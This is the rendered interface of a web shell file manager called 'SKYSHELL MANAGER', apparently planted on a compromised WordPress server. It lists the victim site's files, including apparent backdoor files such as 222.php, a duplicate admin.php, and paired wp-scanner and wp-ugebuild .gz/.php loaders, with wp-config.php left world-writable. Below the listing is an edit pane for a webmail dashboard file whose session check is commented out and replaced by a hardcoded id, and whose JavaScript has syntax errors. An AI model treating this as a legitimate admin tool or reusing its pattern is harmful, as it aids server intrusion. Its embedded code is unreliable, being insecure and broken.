📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
surefundeals
/
Name
Size
Perm
Actions
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0555
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.51 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
222.php
15.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
15.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
0.4 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
license.txt
19.44 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
readme.html
7.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
7.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-blog-header.php
0.34 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-comments-post.php
2.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-config-sample.php
3.26 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-config.php
3.54 KB
0666
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-cron.php
5.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-links-opml.php
2.43 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-load.php
3.84 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-login.php
50.66 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
8.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-scanner.gz
21.5 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-scanner.php
0.15 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-settings.php
31.88 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-signup.php
33.94 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-trackback.php
5.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-ugebuild.gz
47.66 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-ugebuild.php
0.16 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
xmlrpc.php
3.13 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
yyj.txt
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: ind.php
<?php ##include_once "session.php"; include "/var/www/webmail/WebXmail/login/login_session.php"; ##$eid=trim($_SESSION['eid']); ## Re check $eid="123"; ?> <!doctype html> <html> <head> <!-- Bootstrap --> <link rel="stylesheet" href="css/bootstrap.min1.css"> <!-- Bootstrap responsive --> <link rel="stylesheet" href="css/bootstrap-responsive.min.css"> <!-- jQuery UI --> <link rel="stylesheet" href="css/plugins/jquery-ui/smoothness/jquery-ui.css"> <link rel="stylesheet" href="css/plugins/jquery-ui/smoothness/jquery.ui.theme.css"> <!-- Theme CSS --> <link rel="stylesheet" href="css/style.css"> <!-- Color CSS --> <link rel="stylesheet" href="css/themes.css"> <!-- color box --> <!--<link rel="stylesheet" href="js/plugins/colorbox/colorbox.css"> --> <!-- jQuery --> <script src="js/jquery.min.js"></script> <!-- jQuery UI --> <script src="js/plugins/jquery-ui/jquery.ui.core.min.js"></script> <script src="js/plugins/jquery-ui/jquery.ui.widget.min.js"></script> <script src="js/plugins/jquery-ui/jquery.ui.mouse.min.js"></script> <script src="js/plugins/jquery-ui/jquery.ui.draggable.min.js"></script> <script src="js/plugins/jquery-ui/jquery.ui.resizable.min.js"></script> <script src="js/plugins/jquery-ui/jquery.ui.sortable.min.js"></script> <!-- Bootstrap --> <script src="js/bootstrap.min.js"></script> <!-- color box --> <!--<script src="js/plugins/colorbox/jquery.colorbox.js"></script> --> <!--[if lte IE 9]> <script src="js/plugins/placeholder/jquery.placeholder.min.js"></script> <script> $(document).ready(function() { $('input, textarea').placeholder(); }); </script> <![endif]--> <!-- Favicon --> <!-- Apple devices Homescreen icon --> <link rel="apple-touch-icon-precomposed" href="img/apple-touch-icon-precomposed.png" /> <style type="text/css"> #pageloaddiv { position: fixed;left: 0px;top: 0px;width: 100%;height: 100%;z-index: 1000;background: url('<?php echo $loading_img_url;?>') no-repeat center center;border:1px solid 1px; } </style> <style type="text/css"> body { background: #E6E6FA !important; } /* Adding !important forces the browser to overwrite the default style applied by Bootstrap */ .textbox { -moz-border-radius-bottomright: 30px; -webkit-border-bottom-right-radius: 30px; border-bottom-right-radius: 30px; border: 1px solid #848484; outline:0; height:25px; width: 275px; padding-right:20px; } </style> <style> #leftmenu { background: #484848 none repeat scroll 0 0; bottom: 0; height: 100%; left: 0; overflow-x: visible; position: absolute; width: 150px; } .main{ margin-left:150px; overflow: visable; padding-bottom: 30px } div.child-tab.active(display:block;) div.child-tab(display:none;} </style> </head> <body> <div class="container-fluid" id="leftmenu"> <!-- Contenedor --> <ul id="accordion" class="accordion"> <li> <div class="link"><i class="fa fa-database"></i>Webx<i class="fa fa-chevron-down"></i></div> <ul id="menu" class="submenu"> <li id="liid_showmailing" class="tab active"> <a href="smailing" data-toggle="tab"> mailing </a> </li> <li id="liid_process_tab" class="tab"> <a href="sprocess_tab" data-toggle="tab"> Process </a> </li> <li id="liid2_process_tab" class="tab"> <a href="sall_process_tab" data-toggle="tab"> All Process </a> </li> </ul> </li> </ul> </div> <div id="sprocess_tab" class="child-tab"></div> <script> function showprocess() { $.post("process.php", { eid: "2", pflag: = "1" },function(data) { $('#sprocess_tab').html(data); } ); } function showmailing() { $.post("$local_server/mailing.php",{eid:$eid},function(date)($('#viewmailing').html(data);}); } $(document).ready(function () { showmailing(); //show,hide tabs $("li.tab").click(function(){ $("li.tab").removeClass('active'); $('div.child-tab.active').removeClass('active'); var elem=$(this).find('a').attr('href'); $('#'+elem).addClass('active') }); $("#liid_process_tab").click(function() { // showprocess(); $.post("process.php", { eid: "2", pflag: = "1" },function(data) { $('#sprocess_tab').html(data); } ); }); }); </script> </body>
Save